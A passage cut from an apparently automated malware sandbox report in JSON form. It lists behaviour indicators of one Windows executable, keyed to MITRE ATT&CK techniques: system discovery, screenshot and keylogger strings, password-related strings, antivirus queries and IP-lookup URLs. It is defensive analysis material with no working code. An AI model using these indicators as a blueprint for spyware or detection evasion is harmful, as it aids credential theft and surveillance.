\"00000000-00005912-00000C29-63590064\")\n Found reference to API \"SendMessageW\" (Indicator: \"sendmessage\"; Source: \"00000000-00005912-00000C29-63590143\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetWindowTextW\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-79", "type": 1, "relevance": 3, "name": "Contains ability to retrieve system language", "description": "Gma.System.MouseKeyHook.WinApi.KeyboardNativeMethods::GetKeyboardLayout(System.Int32) at 3186fc776c32b580078d6e0da80dcd97-6000980-KeyboardNativeMethods~GetActiveKeyboard", "origin": "Hybrid Analysis Technology", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00005912-00000C29-61863175\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" queries volume information of \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" at 00000000-00005912-0000010C-4521424", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000014009800140200000000000000000000086d300000000000200000000000000000000000804a3200f8693000186b3000e09b3200c06e30000000000008f72b000000000064f92b0095e13d77a5550700feffffffff2b41779a2a417764c5f875b69f4177000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5f875e09b320064c5f87500000000 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000030000000000074013000000000000600000000000000500130001a00000098fa3300000000001a000000000000001400000000000000000000000000000000000000000000000200000298393300630400670000000000000000000000008000000000000000aa24008e80d333000100000000000000020000000c000000788e3300788e3300738e33000000000000000000000030000000000138f618000000000058fc180095e13d779d5b0700feffffff435c41775059417794000000a0000000728e3300708e330094000000dcf71800fdfe0176000000001800000024411c8c (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"IsWow64Process\" with parameter \"5912\" - (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"P~AeS\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"PQAeS~\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"mChacha20\" (Indicator: \"chacha\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_plain_RIPEMD160\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_80\" (Indicator: \"aes128\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_plain_SHA1\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"id_TA_ECDSA_SHA_1\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"EncryptionECDsaWithSha1\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_sha1\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_plain_SHA512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"IdEcdsaWithSha3_512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"id_TA_ECDSA_SHA_512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"THREEFISH_512\" (Indicator: \"threefish\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"EncryptionECDsaWithSha512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_secp521r1_sha512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_brainpoolP512r1tls13_sha512\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SRTP_AES128_CM_HMAC_SHA1_32\" (Indicator: \"aes128\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecka_eg_SessionKDF_AES192\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecka_eg_SessionKDF_AES192\" (Indicator: \"aes192\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"AES_192\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Aes192\" (Indicator: \"aes\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Aes192\" (Indicator: \"aes192\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ECDsaWithSha2\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"THREEFISH_1024\" (Indicator: \"threefish\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"ecdsa_plain_SHA224\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"IdEcdsaWithSha3_224\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"id_TA_ECDSA_SHA_224\" (Indicator: \"ecdsa\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CreateDC\" (Indicator: \"CreateDC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"SELECT Caption FROM Win32_OperatingSystem\" (Indicator: \" Win32_OperatingSystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_BIOS\" (Indicator: \" Win32_BIOS\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_BaseBoard\" (Indicator: \" Win32_BaseBoard\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \" Win32_OperatingSystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"SELECT * FROM AntivirusProduct\" (Indicator: \"antivirusproduct\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1644236197\"\n \"cx\": \"300\"\n \"cy\": \"30\"}\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"906035790\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1644236197\"\n \"cx\": \"6\"\n \"cy\": \"21\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"passwordBasedMac\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"password_value\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Export of key material requires extended_master_secret\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"no password supplied when one expected\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"cannot export keying material without extended_master_secret\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"BCrypt password must be <= 72 bytes\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Missing password.\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"extended_master_secret\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"password\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"extended master secret\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"master secret\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"PKCS12 key store MAC invalid - wrong password or corrupted file.\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"password supplied for keystore that does not require one\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"No password finder specified, but a password is required\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Password is null, but a password is required\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Partner MacTag validation failed. Therefore, the password, MAC, or digest algorithm of each participant does not match.\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"verification requires password check\" (Indicator: \"password\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"can't create secret key object:\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"exception decrypting secret key\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"secret key ring doesn't start with secret key tag: tag 0x\" (Indicator: \"secret\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"passwordFormat=\"Hashed\"\" (Indicator: \"password\"; Source: \"00000000-00005912.00000001.68541.00300000.00000004.mdmp, 00000000-00005912.00000002.70462.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"<p class=\\\"h\\\">[Esc]</p>\" (Indicator: \"[esc]\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "stream-136", "type": 1, "relevance": 5, "name": "Contains ability to retrieve user privileges", "description": "System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) at 3186fc776c32b580078d6e0da80dcd97-600003d-ctor", "origin": "Hybrid Analysis Technology", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"471596010,5984,3024,,RtlGetVersion,NTDLL.dll,\"252:02:48.598\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00005912.00000000.66618.00300000.00000004.mdmp, 00000000-00005912.00000001.68541.00300000.00000004.mdmp, 00000000-00005912.00000002.70462.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"org.bouncycastle.asn1.ua\"\n Heuristic match: \"org.bouncycastle.math.ec\"\n Heuristic match: \"org.bouncycastle.crypto.ec\"\n Heuristic match: \"org.bouncycastle.asn1.gm\"\n Heuristic match: \"org.bouncycastle.math.ec.custom.gm\"\n Heuristic match: \"org.bouncycastle.crypto.io\"\n Heuristic match: \"org.bouncycastle.utilities.io\"\n Pattern match: \"https://ipwho.is/\"\n Pattern match: \"https://stackoverflow.com/q/11564914/23354\"\n Pattern match: \"https://stackoverflow.com/q/14436606/23354\"\n Pattern match: \"https://api.ipify.org/\"\n Pattern match: \"https://stackoverflow.com/q/2152978/23354\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Heuristic match: \"ndows.fo\"\n Heuristic match: \"3\\system.drawing.ni\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-98", "type": 2, "relevance": 1, "name": "Possibly tries to communicate over SSL connection (HTTPS)", "description": "Found HTTPS url \"https://ipwho.is\"\n Found HTTPS url \"https://stackoverflow.com\"\n Found HTTPS url \"https://api.ipify.org\"", "origin": "File/Memory", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>+cce1c58590\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n Potential IP \"<IPv4>\" found in string \"rsion=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" />\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"CryptHashData\" (Indicator: \"CryptHashData\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-280", "type": 